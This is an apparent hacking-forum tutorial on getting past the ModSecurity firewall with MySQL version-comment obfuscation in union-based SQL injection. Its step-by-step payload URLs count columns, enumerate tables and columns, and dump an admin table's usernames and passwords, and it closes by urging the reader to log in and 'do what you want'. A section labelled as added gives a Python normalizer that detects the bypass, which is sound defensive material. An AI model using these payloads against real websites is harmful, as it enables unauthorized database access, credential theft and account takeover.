Bypass Mod_Security


This topic is similar to manual SQL injection, but here mod_security is protecting the website from the attack.
You can see this in the screenshot.


Now, in this tutorial, we will learn how to bypass mod_security.

First we need a target website.
In my case I am using this website:
http://www.target.com.pk

Finding The Amount Of Columns


Now that you have found a vulnerable site, you need to find the number of columns.
You can do this by using the "Order By" clause and increasing the number until the page errors.
Your link should now look like this:

Code:
http://www.target.com.pk/pages.php?ID=18 order by 1--+ (no error)
http://www.target.com.pk/pages.php?ID=18 order by 2--+ (no error)
http://www.target.com.pk/pages.php?ID=18 order by 3--+ (no error)
http://www.target.com.pk/pages.php?ID=18 order by 4--+ (no error)
http://www.target.com.pk/pages.php?ID=18 order by 5--+ (no error)
http://www.target.com.pk/pages.php?ID=18 order by 6--+ (error)

Finding Vulnerable Columns

So now that you have the number of columns, you want to see which ones you can get data from.
You do this by using "Union Select" or "Union All Select". First, you add a - in front of your ID number.
It should look like this:
Code:
http://www.target.com.pk/pages.php?ID=18 union select 1,2,3,4,5--+
but this time you see an error instead of the page.


Now let's see how to bypass this security.
MySQL version comments, /*!50000 ... */, are used to bypass Mod_Security: MySQL 5.0.0 and later executes the text inside such a comment as part of the query, while a signature that looks for the plain keywords in the request sees only a comment.

It should look like this:
http://www.target.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,3,4,5--+
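Added example (not from the original post, written from the detection side): a small Python normalizer that shows why a rule matching the raw request misses the version-comment form above, and how unwrapping /*!NNNNN ... */ and URL-decoding before matching catches it. The sample requests are constructed; no real site or ruleset is involved.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests (not taken from any real site): the plain form,
# the version-comment form from the tutorial, and a benign request.
SAMPLES = {
    "plain":  "pages.php?ID=18 union select 1,2,3,4,5--+",
    "bypass": "pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,3,4,5--+",
    "benign": "pages.php?ID=18",
}

# A naive signature: the two keywords separated only by whitespace.
UNION_SELECT = re.compile(r"union\s+select", re.I)


def naive_match(request: str) -> bool:
    """Apply the signature to the raw request, as a weak rule would."""
    return UNION_SELECT.search(request) is not None


def normalize(request: str) -> str:
    """Approximate what MySQL will see: URL-decode ('+' becomes a space),
    keep the body of /*!NNNNN ... */ version comments, drop ordinary
    /* ... */ comments, lower-case, and collapse whitespace."""
    s = unquote_plus(request)
    s = re.sub(r"/\*!\d{0,5}\s*(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).strip().lower()


def normalized_match(request: str) -> bool:
    """Apply the same signature after normalization."""
    return UNION_SELECT.search(normalize(request)) is not None


def compare(samples: dict) -> dict:
    """Return {name: (raw_hit, normalized_hit)} for each sample request."""
    return {n: (naive_match(r), normalized_match(r)) for n, r in samples.items()}


if __name__ == "__main__":
    for name, (raw_hit, norm_hit) in compare(SAMPLES).items():
        print(f"{name:7} raw={raw_hit!s:5} normalized={norm_hit}")
```

The "bypass" sample is the only one where the two results differ, which is the gap a raw-request signature leaves and a normalization step closes.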

Getting Table Names

Now we want to get the table names from the database.

It should look like this:
Code:
http://www.target.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,3,4,/*!50000gROup_cONcat(table_name,0x0a)*/+from+/*!50000inforMAtion_schema*/.tables+/*!50000wHEre*/+/*!50000taBLe_scheMA*/like+database()--+

Getting Columns Out Of Tables

Now we want the column names of the admin table. CHAR(97, 100, 109, 105, 110) is the table name admin written as character codes.
It should look like this:
Code:
http://www.target.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,3,4,/*!50000gROup_cONcat(column_name,0x0a)*/+from+/*!50000inforMAtion_schema*/.columns+/*!50000wHEre*/+/*!50000taBLe_name*/=CHAR(97, 100, 109, 105, 110)--+




Getting Data From Columns

OK, so I see Username and Password columns, and that is what I want.
Now we just replace a few things.
Code:
http://www.target.com.pk/pages.php?ID=-18 /*!50000union*/ /*!50000select*/1,2,3,4,/*!50000gROup_cONcat(Username,0x0a,Password)*/ from+/*!50000admin*/--+





We got the username and password:
User = admin
Password = admin

Now just find the admin page, log in, and do what you want to do.

Cheers!!!
